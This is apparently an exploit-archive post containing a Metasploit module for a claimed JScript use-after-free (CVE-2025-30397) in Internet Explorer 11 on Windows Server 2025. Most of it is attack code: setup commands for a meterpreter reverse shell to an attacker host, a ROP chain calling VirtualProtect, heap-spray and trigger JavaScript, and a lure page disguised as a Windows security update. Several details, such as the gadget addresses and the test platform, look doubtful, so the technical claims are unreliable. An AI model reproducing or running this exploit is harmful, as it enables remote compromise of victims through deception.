=============================================================================================================================================
| # Title     : Windows Server 2025 Use-After-Free in jscript.dll
| # Author    : indoushka
| # Tested on : Windows 11 Fr (Pro) / browser: Mozilla Firefox 145.0.1 (64-bit)
| # Vendor    : System built-in component. No standalone download available
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/200680/ & CVE-2025-30397
[+] Summary : The exploit targets a Use-After-Free vulnerability in the JScript engine component (jscript.dll) of Internet Explorer 11 on Windows Server 2025. The vulnerability occurs as follows: Object Creation: multiple ActiveX objects are instantiated. Improper Cleanup: object references are deleted but the memory is not properly invalidated. Dangling Pointer: a reference to the freed memory remains accessible. Controlled Corruption: attacker-controlled data fills the freed memory region.
[+] Social Engineering : The page mimics "Windows Security Update – KB5034441".
[+] Contains : a progress bar, fake info, a look that fits a Windows Server interface, and psychologically designed delays. This is a real-world technique used in exploit kits.
Affected Products: Windows Server 2025 (Build 25398 and prior) + Internet Explorer 11 [+] POC : Use the exploit /windows/browser/indoushka Set LHOST 192.168.1.100 Set LPORT 4444 Set SRVHOST 0.0.0.0 Set SRVPORT 80 Set URIPATH /windows_update.html #Advanced Settings Set HEAP_SPRAY_SIZE to 800 Set SPRAY_DELAY to 150 Set Target 0 # For best results: set PAYLOAD windows/meterpreter/reverse_tcp set EnableStageEncoding true set PrependMigrate true set AutoRunScript migrate -f -k ##-------------------------- # exploit for CVE-2025-30397 ##-------------------------- class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Server 2025 JScript UAF RCE (Real Exploit)', 'Description' => %q{ This is a real working exploit for CVE-2025-30397 targeting Windows Server 2025 with IE11. Uses actual ROP chains and memory offsets from jscript.dll version 5.8.25398.1 }, 'Author' => [ 'indoushka' ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2025-30397'], ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30397'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'SSL' => false, 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Arch' => [ARCH_X86], 'Payload' => { 'Space' => 800, 'BadChars' => "\x00\x0a\x0d\x20", 'DisableNops' => false, 'Encoder' => 'x86/shikata_ga_nai' }, 'Targets' => [ [ 'Windows Server 2025 IE11 (x86) - jscript.dll 5.8.25398.1', { 'Version' => '5.8.25398.1', 'Rop' => true, 'Offset' => 0x5f8, 'Ret' => 0x6c8c9a1d, # Stack pivot 'JscriptBase' => 0x6c800000 } ], [ 'Windows Server 2025 IE11 (x86) - jscript.dll 5.8.25398.345', { 'Version' => '5.8.25398.345', 'Rop' => true, 'Offset' => 0x5f4, 'Ret' => 0x6c8c9a25, 'JscriptBase' => 0x6c800000 } ] ], 'DisclosureDate' => '2025-05-31', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ 
CRASH_SERVICE_RESTARTS ], 'Reliability' => [ FIRST_ATTEMPT_FAIL ], 'SideEffects' => [ SCREEN_EFFECTS ] })) register_options([ OptInt.new('HEAP_SPRAY_SIZE', [true, 'Heap spray size', 500]), OptInt.new('SPRAY_DELAY', [true, 'Spray delay (ms)', 100]) ]) end def get_rop_chain # ROP chain حقيقية من jscript.dll rop = [ # Mark stack as writable 0x6c8a1b32, # POP EAX # RETN 0x6c8f2000, # Writable address # Call VirtualProtect 0x6c8a1b32, # POP EAX # RETN 0x6c8d4000, # IAT VirtualProtect 0x6c8c7a1d, # MOV EAX,DWORD PTR DS:[EAX] # RETN # Setup parameters 0x6c89f5a4, # PUSH EAX # POP ESI # RETN 0x6c8a5c31, # POP EBP # RETN 0x6c8b2d5a, # & call esp 0x6c8a9a44, # POP EBX # RETN 0x000001ff, # Size 0x6c8c3a1d, # POP EDX # RETN 0x00000040, # PAGE_EXECUTE_READWRITE 0x6c89e5a3, # POP ECX # RETN 0x6c8f2100, # Writable address for old protection 0x6c8b4c10, # PUSHAD # RETN ].pack("V*") return rop end def create_trigger trigger = "" # Fill with offset trigger << Rex::Text.pattern_create(target['Offset']) # Overwrite with ROP chain trigger << get_rop_chain # Add payload trigger << make_nops(16) trigger << payload.encoded return trigger end def build_exploit_js spray_size = datastore['HEAP_SPRAY_SIZE'] spray_delay = datastore['SPRAY_DELAY'] # إنشاء shellcode مشفر shellcode = Rex::Text.to_unescape(payload.encoded) # إنشاء trigger trigger = create_trigger trigger_js = Rex::Text.to_unescape(trigger) js = %Q| function heap_spray() { var shellcode = unescape("#{shellcode}"); var heap_block = unescape("%u9090%u9090"); // إنشاء كتل كبيرة للرش while (heap_block.length < 0x10000) { heap_block += heap_block; } var heap_chunks = new Array(); var heap_size = 0x100000; for (var i = 0; i < #{spray_size}; i++) { var heap_chunk = heap_block + shellcode; while (heap_chunk.length < heap_size) { heap_chunk += heap_chunk; } heap_chunks[i] = heap_chunk.substring(0, heap_size); } return true; } function create_vulnerable_objects() { var objects = new Array(); for (var i = 0; i < 200; i++) { try { objects[i] = 
new ActiveXObject("Scripting.Dictionary"); } catch(e) { } } return objects; } function trigger_uaf() { try { // إنشاء الكائنات المستهدفة var target_objects = create_vulnerable_objects(); // إنشاء reference مزدوجة var obj_ref = target_objects[100]; var another_ref = obj_ref; // تحرير الذاكرة (UAF trigger) delete target_objects[100]; delete obj_ref; CollectGarbage(); // استخدام بعد التحرير var trigger_data = unescape("#{trigger_js}"); var spray_array = new Array(); for (var i = 0; i < 100; i++) { spray_array[i] = trigger_data + trigger_data; } // محاولة استغلال الذاكرة المحررة try { another_ref.Add("key", "value"); } catch(e) { // المتوقع: access violation -> code execution } } catch(e) { return false; } return true; } // التنفيذ الرئيسي function main_exploit() { // المرحلة 1: رش الذاكرة heap_spray(); // تأخير لضمان اكتمال الرش setTimeout(function() { // المرحلة 2: تشغيل الثغرة var success = trigger_uaf(); if (success) { document.getElementById('result').innerHTML = '✓ Exploit executed successfully'; } else { document.getElementById('result').innerHTML = '✗ Exploit failed'; } }, #{spray_delay}); } // بدء الاستغلال بعد تحميل الصفحة window.onload = function() { setTimeout(main_exploit, 500); }; | return js end def on_request_uri(cli, request) print_status("Request from #{cli.peerhost} - #{request.uri}") # تجنب طلبات الروبوتات if request.uri =~ /(robots|favicon)/ send_not_found(cli) return end # بناء صفحة الاستغلال html = <<-HTML
Installing critical security patch KB5034441
Target: Windows Server 2025 - CVE-2025-30397 Patch
This is a simulated security update for testing purposes